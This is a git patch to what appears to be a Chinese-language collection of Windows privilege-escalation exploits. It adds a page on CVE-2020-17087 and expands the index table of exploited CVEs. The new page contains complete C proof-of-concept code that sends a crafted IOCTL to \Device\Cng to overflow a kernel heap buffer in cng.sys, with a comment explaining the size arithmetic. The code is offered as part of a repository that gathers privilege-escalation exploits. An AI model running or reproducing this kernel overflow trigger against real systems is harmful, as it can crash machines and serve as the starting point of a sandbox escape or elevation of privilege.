From d09c9ad44c6f672921e4545ec99be6551b7fe685 Mon Sep 17 00:00:00 2001 From: Ascotbe <869335729@qq.com> Date: Thu, 12 Nov 2020 14:16:03 +0800 Subject: [PATCH] Synchronize Microsoft's November patch vulnerability:mag: --- CVE-2020-17087/README.md | 111 +++++++++++++++++++++++++++++ README.md | 146 ++++++++++++++++++++------------------- 2 files changed, 187 insertions(+), 70 deletions(-) create mode 100644 CVE-2020-17087/README.md diff --git a/CVE-2020-17087/README.md b/CVE-2020-17087/README.md new file mode 100644 index 0000000..e692246 --- /dev/null +++ b/CVE-2020-17087/README.md @@ -0,0 +1,111 @@ +## CVE-2020-17087 + +#### 描述 + +Windows 内核密码驱动程序 cng.sys 中的特权提升漏洞,已作为 CVE-2020-15999(FreeType 2 库中的缓冲区溢出漏洞)的漏洞链的一部分被广泛利用。CVE-2020-17087 被用于逃脱 Google Chrome浏览器的沙箱,以提升被利用系统的特权,且目前该漏洞已被在野利用。 + +#### 影响版本 + +| Product | CPU Architecture | Version | Update | Tested | +| :------------------ | :--------------- | ------- | ------ | ------ | +| Windows Server 2019 | | | | | +| Windows Server 2012 | | R2 | | | +| Windows Server 2012 | | | | | +| Windows Server 2008 | X64 | R2 | SP1 | | +| Windows Server 2008 | X86/X64 | | SP2 | | +| Windows RT 8.1 | | | | | +| Windows 8.1 | X86/X64 | | | | +| Windows 7 | X86/X64 | | SP1 | | +| Windows Server 2016 | | | | | +| Windows 10 | X86/X64 | 1607 | | | +| Windows 10 | | | | | +| Windows 10 | X86/X64/ARM64 | 20H2 | | | +| Windows 10 | X86/X64/ARM64 | 2004 | | | +| Windows 10 | X86/X64/ARM64 | 1903 | | | +| Windows 10 | X86/X64/ARM64 | 1909 | | | +| Windows 10 | X86/X64/ARM64 | 1809 | | | +| Windows 10 | X86/X64/ARM64 | 1803 | | | +| Windows Server | | 20H2 | | | +| Windows Server | | 2004 | | | +| Windows Server | | 1903 | | | +| Windows Server | | 1909 | | | + +#### 修复补丁 + +``` +https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087 +``` + +#### 利用方式 + +目前没有利用方式,只有一个概念代码 + +``` +#pragma comment(lib, "ntdll") + +#include +#include + +int main() { + HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng", + GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); + +if (hCng == NULL) { + printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError()); + return 1; +} + +printf("[+] \\Device\\Cng opened, handle: %p\n", hCng); + +// +// DataBufferSize overflows when used for allocating memory in +// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6). +// +// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2 +// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it. +// +CONST DWORD DataBufferSize = 0x2AAB; +CONST DWORD IoctlSize = 4096 + DataBufferSize; +BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize); + +RtlZeroMemory(IoctlData, IoctlSize); + +*(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D; +*(DWORD*) &IoctlData[0x04] = 0x10400; +*(DWORD*) &IoctlData[0x08] = 1; +*(ULONGLONG*)&IoctlData[0x10] = 0x100; +*(DWORD*) &IoctlData[0x18] = 3; +*(ULONGLONG*)&IoctlData[0x20] = 0x200; +*(ULONGLONG*)&IoctlData[0x28] = 0x300; +*(ULONGLONG*)&IoctlData[0x30] = 0x400; +*(DWORD*) &IoctlData[0x38] = 0; +*(ULONGLONG*)&IoctlData[0x40] = 0x500; +*(ULONGLONG*)&IoctlData[0x48] = 0x600; +*(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW +*(ULONGLONG*)&IoctlData[0x58] = 0x1000; +*(ULONGLONG*)&IoctlData[0x60] = 0; +RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12); +RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12); + +ULONG_PTR OutputBuffer = 0; +DWORD BytesReturned; +BOOL Status = DeviceIoControl( + hCng, + 0x390400, + IoctlData, + IoctlSize, + &OutputBuffer, + sizeof(OutputBuffer), + &BytesReturned, + NULL +); + +printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer); + +HeapFree(GetProcessHeap(), 0, IoctlData); +CloseHandle(hCng); + +return 0; +} +``` + diff --git a/README.md b/README.md index 11c07f3..1736543 100644 --- a/README.md +++ b/README.md @@ -13,12 +13,17 @@ 该项目是一个Windows提权搜集项目,除未通过测试EXP都有详细说明以及演示GIF图,如果项目中的代码有您的代码,本人为标注来源的请提交Issues +> 提示 + +本项目优先追踪内核相关提权漏洞,如果当月漏洞存在远程命令执行的话,只有在互联网生存在EXP或者POC的时候才会更新,如有遗漏欢迎提Issues并带上利用代码 + > 未测试成功编号 下列编号都是在筛选后未能通过复现测试的CVE,附带未成功原因,欢迎提交PR | SecurityBulletin | Remarks | | ---------------- | -------------------------------------------------- | +| CVE-2020-17087 | 2020年11月补丁,只有概念验证,无利用代码 | | CVE-2015-0002 | 有源码未能测试成功 | | CVE-2015-0062 | 有源码和EXP未能测试成功 | | CVE-2015-1725 | 有源码未知编译方式 | @@ -40,76 +45,77 @@ ### 编号列表 -| SecurityBulletin | Description | OperatingSystem | -| :--------------------------------- | :----------------------------------------------------------: | :----------------------------------------: | -| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure Vulnerability | Windows 2004 | -| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution Vulnerability | Windows 10/2019/1903/1909/2004 | -| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/1903/1909/2004 | -| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows 1903/1909 | -| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | -| [CVE-2019-0859](./CVE-2019-0859) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8440](./CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-1038](./CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-0743](./CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | -| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | -| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3309](./CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1725](./CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | -| [CVE-2015-0062](./CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | -| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0002](./CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | -| [CVE-2014-6324](./CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-6321](./CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | -| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2013-5065](./CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | -| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | -| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2013-0008](./CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | -| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | -| [CVE-2012-0002](./CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-0045](./CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | -| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | -| [CVE-2010-2554](./CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | -| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | -| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2010-0020](./CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | -| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | -| [CVE-2009-0079](./CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | -| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | -| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | -| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | -| [CVE-2005-1983](./CVE-2005-1983) | PnP Service | Windows 2000/Xp | -| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | +| SecurityBulletin | Description | OperatingSystem | +| :--------------------------------- | :----------------------------------------------------------: | :------------------------------------------------------: | +| [CVE-2020-17087](./CVE-2020-17087) | Windows Kernel Local Elevation of Privilege Vulnerability | Windows 7/8.1/10/2008/2012/2016/2019/20H2/2004/1903/1909 | +| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure Vulnerability | Windows 2004 | +| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution Vulnerability | Windows 10/2019/1903/1909/2004 | +| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/1903/1909/2004 | +| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows 1903/1909 | +| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | +| [CVE-2019-0859](./CVE-2019-0859) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8440](./CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-1038](./CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-0743](./CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | +| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | +| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3309](./CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1725](./CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | +| [CVE-2015-0062](./CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | +| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0002](./CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | +| [CVE-2014-6324](./CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-6321](./CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | +| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2013-5065](./CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | +| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | +| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2013-0008](./CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | +| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | +| [CVE-2012-0002](./CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-0045](./CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | +| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | +| [CVE-2010-2554](./CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | +| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | +| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2010-0020](./CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | +| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | +| [CVE-2009-0079](./CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | +| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | +| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | +| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | +| [CVE-2005-1983](./CVE-2005-1983) | PnP Service | Windows 2000/Xp | +| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt |